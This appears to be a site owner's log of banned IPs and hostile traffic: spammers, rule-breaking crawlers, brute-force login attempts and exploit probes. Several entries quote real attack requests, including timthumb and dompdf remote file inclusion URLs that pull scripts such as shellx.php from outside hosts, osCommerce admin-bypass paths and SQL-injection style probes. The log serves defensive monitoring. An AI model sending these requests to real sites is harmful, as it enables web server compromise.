Malicious User Agent detected:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
198.50.128.0 – 198.50.255.255 Company: Canada – Montreal Ovh Hosting Inc. Bad host: Ovh Hosting
198.50.215.62 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Hijacked browser detected: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
74.63.200.114 Hostname: 114-200-63-74.static.reverse.lstn.net
Company: Dallas Limestone Networks Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
67.159.8.162 Hostname: widethrone.quinninsurancequote.info
Company: United States – Chicago Fdcservers.net
Tried to register on restricted site
Listed Comment spammer
100.43.83.149 Hostname: spider-100-43-83-149.yandex.com
Company: Russian Federation – Moscow Yandex Inc
UA: Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Rule Breaker – YandexBot/3.0
Rule breaker
Read robots.txt then tried to crawl the site
36.248.28.19 Company: China – Fuzhou Fuzhou City Fujian Provincial Network Of Unicom Brute force login/register attempt
/profile.php?mode=register&agreed=true&coppa=0
/index.php?act=Login&CODE=00
/ucp.php?mode=register
/registration_rules.asp?FID=0
/index.php?do=/user/register/
/index.php?page=en_Signup
/tools/quicklogin.one
/?page=login&cmd=register
/wp-login.php?action=register
/?s=Register
/index.php?app=core&module=global&section=login
/index.php?p=member/signup
/YaBB.cgi/
YaBB.pl/
/index.php/forums/member/register
/member/join.php
/join_form.php
HACKING ATTEMPT: URL//+encodeURIComponent(location.href)+
Project Honeypot listed comment spammer
36.248.0.0 – 36.248.63.255 Company: China – Fuzhou Fuzhou City Fujian Provincial Network Of Unicom Banned region: China
192.74.228.97 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
192.74.228.96 – 192.74.228.111 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Bad host
142.4.117.121 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
142.4.117.120 – 142.4.117.127 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Bad host
74.208.111.127 Hostname: s15357077.onlinehome-server.com
Company: United States – Wayne 1&1 Internet Inc.
Shared hosting server IP
Looking for vulnerability:
/connectors/lang.js.php
157.56.93.62 Hostname: msnbot-157-56-93-62.search.msn.com
Company: United States – Chicago Microsoft Corp
User Agents:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
msnbot-UDiscovery/2.0b (+http: //search.msn.com/msnbot.htm)
Bad search bot using bad lookup requests
[URL]/%3Cscript%3E%20%20%20var%20_
ds_midx;%20%20%20if%20(!_ds_midx)%20{%20%20%20%20%20_ds_midx%20=%20
{%20%20%20%20%20%20%20accountId:%2041551,%20%20%20%20%20%20%20
searchSetupId:%2024%20%20%20%20%20};%20%20%20%20%20(function()%20
{%20%20%20%20%20%20%20var%20r%20=%20document.createElement(\’script\’);
%20%20%20%20%20%20%20var%20s%20=%20document.getElementsByTagName
(\’script\’)[0];%20%20%20%20%20%20%20r.async%20=%20true;%20%20%20%20%
20%20%20r.src%20=%20\’http: //****.*******
8.29.140.157 Hostname: 8-29-140-157.bhsrv.net
Company: United States – Cincinnati Beyond Hosting Llc
Looking for WordPress xmlrpc.php
199.30.20.27 Hostname: msnbot-157-56-93-62.search.msn.com
Company: United States – New Port Richey Microsoft Corp
User agent:
msnbot-media/1.1 (+http: //search.msn.com/msnbot.htm)
Rule Breaker
Read robots.txt then immediately crawled disallowed folder
(/wp-content/uploads/) and file extension (.jpg)
41.248.151.201 Company: Morocco – Rabat Adsl Maroc Telecom Comment Spammer
Bad host
64.120.11.251 Hostname: 64.120.11.251.rdns.ubiquityservers.com
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
trying to register on restricted site
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
192.74.236.169 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Looking for indexes – index.php
Bad host
66.85.159.194 Company: United States – Phoenix Secured Servers Llc Trying to register on restricted site
108.170.18.49 Company: United States – Phoenix Secured Servers Llc Comment Spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
66.248.202.119 Company: United States – Dallas Hayden Dohert Comment Spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
83.139.189.31 Company: Russian Federation – Voronezh Ic-voronezh Trying to access /administrator/index.php
103.30.29.2 Company: Bangladesh – Chittagong Bbts Network Bad request:
URL/+\”trackback+from+your+own+site\”+gamer+mouse&ct=clnk
192.119.151.137 Company: United States – Dallas Hayden Dohert Malicious user agent detected: PHP/5.2.10
64.120.218.18 Hostname: 64-120-218-18.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Malicious user agent detected: PHP/5.2.10
87.101.240.8 Hostname: cache-kho3.itc.net.sa
Company: Saudi Arabia – Riyadh Integrated Telecom Co. Ltd
Comment spammer, spam harvester, mails server, dictionary attacker
Seen with malicious user agents incl:
libwww-perl/5.805
MJ12bot/v1.0.8 (http: //majestic12.co.uk/bot.php?+)
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
142.4.112.234 Company: United States – San Jose Vpsbus
PEGTECHINC – PEG TECH INC
Website server IP: 2 websites kvitosvit-semena.com.ua kvitosvit.com.ua
Comment spammer
Bad host
188.208.15.62 Company: Romania – Iasi Sc Rados Impex Srl Trying to register on restricted site
193.106.27.215 Company: Ukraine – Chernivtsi C.t.net Ltd Comment Spammer
198.50.215.17 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host: Ovh Hosting Inc.
89.47.29.198 Company: Romania – Iasi Sc Eurocris Impex Srl Comment Spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
192.95.57.170 Hostname: titan.genohost.com
Company: Canada – Montreal Ovh Hosting Inc.
Remote File Inclusion attempt / WordPress timthumb RFI exploit using very long requests:
(URL)/symi-fct01.html&sa=U&ei=eYS7UaTaLOHRyAHg1IC4Dg&ved=
0CEkQFjAPOKwC&usg=AFQjCNGItTTlFv90UyzTfogbMTQZV0g78g/wp-content/themes/
Growing-Feature/includes/thumb.php?src=http: //flickr.com.smsmesajlari.tk/xp.php/
wp-content/themes/Growing-Feature/includes/thumb.php?src=http:
//flickr.com.smsmesajlari.tk/xp.php
Bad host: Ovh Hosting Inc.
89.74.157.151 Hostname: 89-74-157-151.dynamic.chello.pl
Company: Poland – Warsaw Upc Polska Sp. Z O.o.
Trying to register on restricted site
/user/registerindex.php
197.253.6.97 Company: Nigeria – Lagos Mainone Cable Company Probably looking for known WordPress GD Star ratings vulnerability from old plugin version
/wp-content/plugins/wp-ui/css/css.php?styles=wpui-light%7Cwpui-blue%7Cwpui-red%7Cwpui-green%
7Cwpui-dark%7Cwpui-quark%7Cwpui-alma%7Cwpui-macish%7Cwpui-redmond%7Cwpui-sevin&ver=3.5.1
/wp-content/plugins/gd-star-rating/css/gdsr.css.php?o=off&s=a10i10m20k20c05r05%23121620243046%
23121620243240%23s1pchristmas%23s1pcrystal%23s1pdarkness%23s1poxygen%23s1goxygen_gif%
23s1pplain%23s1ppumpkin%23s1psoft%23s1pstarrating%23s1pstarscape%23t1pclassical%23t1pstarrating
%23t1gstarrating_gif%23lsgflower&t=1357456617&ver=1.9.22
Known Dictionary attacker
89.201.178.150 Hostname: 89-201-178-150.dsl.optinet.hr
Company: Croatia – Zagreb Ot – Optima Telekom D.d.
Dictionary Attacker
Hotlinker
Trying to fake Google Search:
81.95.126.169 Hostname: hosted-by.fusa.be
Company: Belgium – Brugge Lcp Nv
Shared hosting server IP: 3 websites: kingslize.be kingslizepizza.be pizzalier.be
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
89.184.79.71 Hostname: en390.mirohost.net
Company: Ukraine – Kiev Internet Invest Ltd.
Shared hosting server IP: 9 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
wp-content/themes/backstage/tools/timthumb.php?src=http: //flickr.com.rmacomputacion.com.ar/bad.php
87.244.152.77 Hostname: 77-152-244-87.sat.poltava.ua
Company: Ukraine – Kiev Satellite Ltd
Trying to access non-existent wp-login
67.228.95.2 Hostname: 67.228.95.2-static.reverse.softlayer.com
Company: United States – San Jose Softlayer Technologies Inc.
Remote File Inclusion attempt / WordPress timthumb RFI exploit using very long requests
/rss.xml” onclick=”javascript:_gaq.push([‘_trackEvent’,’outbound-widget’,’****’]);” target=
“_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px; margin-right: 6px; margin-top:
0px; margin-bottom: 0px;” src=”****”alt=”” width=”16″ height=”16″ />*****</a><br />
<a href=”*****” target=”_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px;
margin-right: 6px; margin-top: 0px; margin-bottom: 0px;” src=”*******” alt=””
width=”16″ height=”16″ />*****</a><br /><a href=”******/feed/” onclick=”javascript:_gaq.push
([‘_trackEvent’,’outbound-widget’,’*******’]);” target=”_blank” rel=”nofollow”><img style=
“float: left; margin-left: 6px; margin-right:6px;” src=”****” alt=”” width=”16″ height=”16″ />
****</a><br /><a href=”*****” target=”_blank” rel=”nofollow”><img style=”float: left; margin-left:
6px; margin-right: 6px;” src=http: //picasa.com.amandas-designs.com/eva.php
Seen with malicious user agent libwww-perl/6.04
and fake user agent: Mozilla/5.0 (compatible; Googlebot/2.1; http: //www.google.com/bot.html)
64.207.188.178 Hostname: jjvt-zz2w.accessdomain.com
Company: United States – Culver City Media Temple Inc.
Shared hosting server IP: 8 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit using very long requests
/rss.xml” onclick=”javascript:_gaq.push([‘_trackEvent’,’outbound-widget’,’****’]);” target=”
_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px; margin-right: 6px; margin-top: 0px;
margin-bottom: 0px;” src=”****” alt=”” width=”16″ height=”16″ />*****</a><br />
<a href=”*****”target=”_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px;
margin-right: 6px; margin-top: 0px; margin-bottom: 0px;” src=”*******” alt=”” width=”16″
height=”16″ />*****</a><br /><a href=”******/feed/” onclick=”javascript:_gaq.push
([‘_trackEvent’,’outbound-widget’,’*******’]);” target=”_blank” rel=”nofollow”>
<img style=”float: left; margin-left: 6px; margin-right: 6px;” src=”****” alt=”” width=”16″
height=”16″ />****</a><br /><a href=”*****” target=”_blank” rel=”nofollow”>
<img style=”float: left; margin-left: 6px; margin-right: 6px;” src=http:
//picasa.com.amandas-designs.com/eva.php
Bad host: Culver City Media Temple Inc.
85.214.23.182 Hostname: h654956.serverkompetenz.net
Company: Germany – Berlin Strato Ag
Website server IP: website – mydesigna.info
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.239.232.108 Hostname: 91.239.232.106.hostpro.com.ua
Company: Ukraine – Kiev Hostpro Ltd.
Website server IP: 2 websites kvitosvit-semena.com.ua kvitosvit.com.ua
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.239.232.106 Hostname: 91.239.232.108.hostpro.com.ua
Company: Ukraine – Kiev Hostpro Ltd.
Website server IP: 1 website nday.te.ua
Comment Spammer
157.55.32.76 Hostname: msnbot-157-55-32-76.search.msn.com
Company: United States – Redmond Microsoft Corp
Rule Breaker
Crawling robots.txt disallowed folders, and URLs
/trackback/
/feed/
I am now banning all spiders from Bing and MSN search until they get their bots to behave
151.237.190.172 Company: Sweden – Stockholm Deepak Mehta Fie Comment Spammer / Trackback Spammer
Bad Host: Deepak Mehta Fie
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
179.252.28.85 Company: Brazil – Brasilia Brasil Telecom S/a – Filial Distrito Federal Tried to login to WordPress admin
193.107.72.167 Hostname: host167.net-city.net
Company: Ukraine – Smila Fop Osaula Mihail Dmitrovich
Brute force login / dictionary attack
/user/login/index.php
65.55.52.117 Hostname: msnbot-65-55-52-117.search.msn.com
Company: United States – New York City Microsoft Corp
User agent:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Trying to get property of non-object in aggregator_page_rss()
(line 390 of /home/******i/public_html/modules/aggregator/aggregator.pages.inc)
Rule breaker – ignored robots.txt and crawled site
bingbot/2.0 is disallowed in robots.txt
All Bing / MSN bots are banned from my sites
85.131.246.130 Hostname: mail.link11.de
Company: Germany – Frankfurt Am Main Link11 Gmbh
Malicious user agent: libwww-perl/5.836
204.14.79.144 Company: United States – Tea Areti Internet Llc Comment Spammer
Mail server
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
81.216.60.250 Company: Sweden – Sollentuna Borenet Ab Looking for vulnerable JavaScripts
Several requests detected
93.186.180.251 Hostname: jaggledell.oxilion.nl
Company: Netherlands – Enschede Oxilion B.v.
Shared hosting server IP: 5 websites
Suspected attempt to exploit WordPress jsDelivr plugin:
/jsdelivr-wordpress-cdn-plugin-review/e107
/e107
/jsdelivr-wordpress-cdn-plugin-review/&sa=U&ei=gva2UdukIqariAKpvYC4BA&ved=0CH0QFjAe&usg=AFQjCNEfu69NoF9E0hCNQygRhbG1vHMtvQ/e107
5.135.11.115 Company: France – Roubaix Ovh Systems Trackback spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
151.237.190.176 Company: Sweden – Stockholm Deepak Mehta Fie Trackback spammer
Hijacked Browser – User agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
190.152.171.152 Company: Ecuador – Guayaquil Corporacion Nacional De Telecomunicaciones – Cnt Ep Trying to access wp-admin.php and wp-login.php
181.112.185.102 Company: Ecuador – Guayaquil Corporacion Nacional De Telecomunicaciones – Cnt Ep Trying to access wp-admin.php and wp-login.php
Known Dictionary attacker
142.4.214.32 Hostname: ns4004303.ip-142-4-214.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
91.200.14.5 Company: Ukraine – Lenina Pp Sks-lugan Comment Spammer
94.23.92.186 Hostname: 94-23-92-186.kimsufi.com
Company: France – Roubaix Ovh Systems
Trying to register
/registerindex.php
216.22.48.102 Hostname: vps.bbspot.com
Company: United States – Mclean Smv
Shared hosting server IP: 18 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/widescreen/includes/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinformatica.com%2Fbad.php
88.86.111.225 Hostname: strike2.digitalniservis.cz
Company: Czech Republic – Prague Supernetwork S.r.o.
Shared hosting server IP: 51 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.119.148.184 Company: United States – Dallas Jason Cross Seen with malicious user agent: PHP/5.2.10
37.59.64.10 Company: France – Roubaix Ovh Systems Trackback Spammer
188.165.151.170 Company: United Kingdom – London Ovh Systems Trackback spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
87.151.171.227 Hostname: p5797ABE3.dip0.t-ipconnect.de
Company: Germany – Berlin Deutsche Telekom Ag
Mail Server
Trying to load non-existent css files directly
{FOLDER}/files/css/css_alhdwgr_1c9bu6d-gsnrwf7jkbs_kvwdvli98atiij4.css
{FOLDER}/files/css/css_pbm0lsqqj7a7wccimgxlho6mi_kbngznnuwmtwcnfoe.css
94.27.81.217 Hostname: SOL-FTTB.217.81.27.94.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
194.8.30.66 Hostname: web2.host-services.com
Company: Portugal – Faro Flesk Lda
Shared hosting server IP: 594 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.46.138.69 Hostname: host.colocrossing.com
Company: United States – Kingston Hudson Valley Host
Comment Spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
37.59.219.121 Company: France – Roubaix Ovh Systems Comment Spammer
64.207.145.168 Hostname: vps.webedgedesign.com
Company: United States – New York City Media Temple Inc.
Website server IP: website – trendnation.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.64.8.16 Company: Canada – Montreal Synaptica Comment Spammer
Trackback Spammer
91.244.149.252 Company: Ukraine – Pervomays’k Pp Sks-pervomaysk Looking for exploit vulnerability
/engine/engine.php
95.9.186.85 Hostname: 95.9.186.85.static.ttnet.com.tr
Company: Turkey – Etimesgut Turk Telekomunikasyon Anonim Sirketi
Comment Spammer
95.132.5.223 Hostname: 223-5-132-95.pool.ukrtel.net
Company: Ukraine – Kiev Jsc Ukrtelecom
Comment Spammer
173.212.192.169 Company: United States – Chandler Dme Hosting Llc Comment Spammer
188.165.166.54 Company: France – Roubaix Ovh Systems Trackback spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
142.4.117.81 Company: United States – San Jose Ji Tesi Comment Spammer
66.248.193.209 Company: United States – San Jose Ji Tesi Bot trying to register on restricted site
188.138.124.56 Hostname: loft8055.serverloft.com
Company: Germany – Hurth Intergenia Ag
Shared hosting server IP: 150 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
{URL}&amp;sa=U&amp;ei=OtezUd24AumJ7Ab8uYCYBg&amp;ved=0CFcQFjAUOKwC&amp;usg=AFQjCNE9ghhZjiyQZkEhJZGKEYaPEKKZFQ/admin/banner_manager.php/login.php
{URL}&amp;sa=U&amp;ei=OdezUaOJL6ey7AbdrICgDA&amp;ved=0CFcQFjAUOKwC&amp;
usg=AFQjCNGC3m73wvkYTNv-Oyv0_hquxwXuUQ/admin/file_manager.php/login.php
{URL}&amp;sa=U&amp;ei=OtezUaH8B8TE7AaKlYEg&amp;ved=0CFcQFjAUOKwC&amp;usg=AFQjCNFPeBaX5TBwmhaaV40SoDgE56VxMQ/admin/categories.php/login.php
207.58.134.164 Hostname: vps.webedgedesign.com
Company: United States – New York City Smv
Website server IP: website – bigplay.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.245.49.72 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host: Ovh Hosting Inc.
199.180.119.202 Company: United States – Scranton Volumedrive
Website server IP:
Comment Spammer
91.121.216.191 Company: France – Roubaix Ovh Systems Comment Spammer
Bad host: Roubaix Ovh Systems.
88.190.40.138 Company: France – Roubaix Ovh Systems Comment Spammer
Bad host: Roubaix Ovh Systems.
89.221.250.9 Hostname: www9.aname.net
Company: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting server IP: 731 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
209.140.19.57 Hostname: vps.datanic.cl
Company: United States – Fulshear Landis Holdings Inc
Shared hosting server IP: 40 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/the_dark_os/tools/timthumb.php?src=http: //flickr.com.kforkent.com/cpx.php
/wp-content/themes/the_dark_os/tools/timthumb.php?src=http: //flickr.com.kforkent.com/shellx.php
91.243.165.49 Company: Iran, Islamic Republic Of – Tehran Sari System Bandarabas Company Trackback Spammer
188.143.233.173 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment Spammer
142.4.212.103 Hostname: ns4003924.ip-142-4-212.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
Bad host
94.19.191.183 Hostname: 94.19.191.183.pool.sknt.ru
Company: Russian Federation – Saint Petersburg Skynet Ltd.
Comment Spammer
100.42.213.40 Hostname: 100-42-213-40.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment spammer
Looking for wp-content/uploads/index.php
37.247.122.177 Hostname: dns2.avantigrup.net
Company: Spain – Madrid Estrategias Website S.l.
Shared hosting server IP: 45 websites
Looking for exploit vulnerability
DOMAIN/is-human/
103.9.101.161 Hostname: sg161.singhost.net
Company: Singapore – Singapore Vodien Internet Solutions Pte Ltd
Shared hosting server IP: 545 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Variations of these with long requests e.g.
/&amp;sa=U&amp;ei=Ybi5UcLVEeit0QWfs4H4DQ&amp;ved=0CCAQFjAA&amp;usg=
AFQjCNENW0XAAbiWt2IAIBCbagnZDcBd_A/admin/banner_manager.php/login.php
85.204.251.238 Company: Romania – Pitesti Krogertek Srl Comment spammer
192.74.228.177 Company: United States – San Jose Ji Tesi Comment spammer
89.21.94.200 Company: Ukraine – Zaporizhzhya Tov Bf Express Ltd Brute force / DOS hacking attack
Looked for:
/includes/admin_board2.php?phpbb_root_path=1’+–+?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=1’+–+?
/rurl=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK
/includes/functions.inc.php?sitepath=1’+–+
plus over 200 other attempts
Attack continued for 6 minutes
65.55.24.243 Hostname: msnbot-65-55-24-243.search.msn.com
Company: United States – Redmond Microsoft Corp
Bing Bot – User Agent:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Rule breaker:
Ignores robots.txt
Specific violation: Disallow .html.-
Crawled URL/.html.-
Crawled non-existent URLs
184.168.116.128 Hostname: ip-184-168-116-128.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Shared hosting server IP: 9 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
199.71.214.71 Hostname: mail09.tccls.com
Company: United States – Union City Psychz Networks
Trying to register on restricted site
Banned User Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
69.197.189.13 Company: United States – Kansas City Wholesale Internet Inc. Brute force attempt to register on restricted site
/member.php?mod=register
/reg.asp
/index.asp?T=reg
/CreateUser.asp
//register.aspx?agree=yes
/index.php?action=registernew
/index.php?app=core&module=global&section=register
/index.php?CODE=00&act=Reg
/index.php?do=/user/register/
/login.php?action=person&part=register
/index_do.php?dopost=regnew&fmdo=user
/reg.asp?reg=reg
Bot hit site about 80 times in 90 seconds
46.229.164.97 Company: Netherlands – Amsterdam Haldex Ltd Unwanted bot: SemrushBot
User agent ID: Mozilla/5.0 (compatible; SemrushBot/0.95; +http: //www.semrush.com/bot.html)
202.46.63.91 Company: China Shenzhen – Shenzhen Sunrise Technology Co. Ltd. Banned Bot: Baiduspider
User Agent ID: Mozilla/5.0 (compatible; Baiduspider/2.0; +http: //www.baidu.com/search/spider.html)
100.43.83.158 Company: Russian Federation – Moscow Yandex Inc Banned Bot: YandexBot
User Agent ID: Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
61.38.186.221 Company: Korea, Republic Of – Seoul Dacom Corp. Comment Spammer
94.73.156.146 Hostname: 94-73-156-146.cizgi.net.tr
Company: Turkey – Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi
RFI attack on dompdf.php (Doesn’t exist on site)
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/list.php??URL&amp;sa=U&amp;ei=
sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=
AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/kenx.php??
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/kan.php??
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/kun.php??
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/flow.php??
Each attempt followed by:
//dompdf.php?input_file=test??
94.73.156.144-94.73.156.151 Company: Turkey – Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi Turkey
Bad host
188.92.75.244 Company: Latvia – Riga Ad Technology Sia Comment Spammer
188.92.75.0 – 188.92.75.255 Company: Latvia – Riga Ad Technology Sia Banned region: Latvia
70.86.19.242 Hostname: server1.andisites.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP: 87 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
88.233.215.231 Hostname: 88.233.215.231.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force dictionary attack on site admin with user name admin
over 100 hits in 2 minutes
/user/
/bitrix/admin/index.php?lang=en
/admin/
88.233.0.0 – 88.233.255.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host: Ankara Turk Telekomunikasyon Anonim Sirketi
37.59.189.227 Company: France – Roubaix Ovh Systems Comment spammer
Bad host
142.4.112.225 Company: France – San Jose Jiusutechnology Limited Liability Company
PEG TECH INC
Comment spammer
Bad host
142.4.112.224 – 142.4.112.231 Company: France – San Jose Jiusutechnology Limited Liability Company
PEG TECH INC
Bad Host: PEG TECH INC
66.235.180.47 Company: United States – Rio Linda Hopone Internet Corporation
Website server IP: 3 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/widescreen/includes/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinformatica.com%2Fbad.php
84.54.160.228 Hostname: 88.233.215.231.dynamic.ttnet.com.tr
Company: Bulgaria – Sofia Comnet Bulgaria Holding Ltd.
Tried to access /wp-signup
Bad host
84.54.160.0 – 84.54.175.255 Company: Bulgaria – Sofia Comnet Bulgaria Holding Ltd. Restricted Region: Bulgaria
Bad host: Sofia Comnet Bulgaria Holding Ltd.
Multiple IPs in their range listed as spammers and dictionary attackers
89.28.101.245 Hostname: 89-28-101-245.starnet.md
Company: Moldova, Republic Of – Chisinau Starnet S.r.l
Comment spammer
190.14.225.106 Hostname: 19014225106.ip2.static.mediacommerce.com.co
Company: Colombia – Pereira Media Commerce Partners S.a
Comment spammer
159.253.130.4 Hostname: shop.server-038.com
Company: United Kingdom – London Softlayer Dutch Holdings Bv
Shared hosting server IP: 615 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
&sa=U&ei=e5uwUaD-NrHAiwKmgYHoCQ&ved=0CB4QFjAB&usg=
AFQjCNFgETfScJ9MWSB1am2o6bSA8QSJKA/wp-content/plugins/lightbox-plus/tools/
timthumb.php?src=http: //flickr.com.smsmesajlari.tk
/wp-content/plugins/lightbox-plus/tools/timthumb.php?src=http: //flickr.com.smsmesajlari.tk/xp.php
94.68.110.48 Hostname: ppp-94-68-110-48.home.otenet.gr
Company: Greece – Athens Multiprotocol Service Provider To Other Isp’s And End Users
Mail server
94.181.130.242 Hostname: dynamicip-94-181-130-242.pppoe.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment spammer
94.181.128.0 – 94.181.159.255 Company: Russian Federation – Penza Cjsc Er-telecom Holding Banned region: Russian Federation
168.62.209.75 Company: United States – San Francisco Microsoft Corp Trying to register on restricted site
/user/register
190.255.186.210 Company: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp Trying to register on restricted site
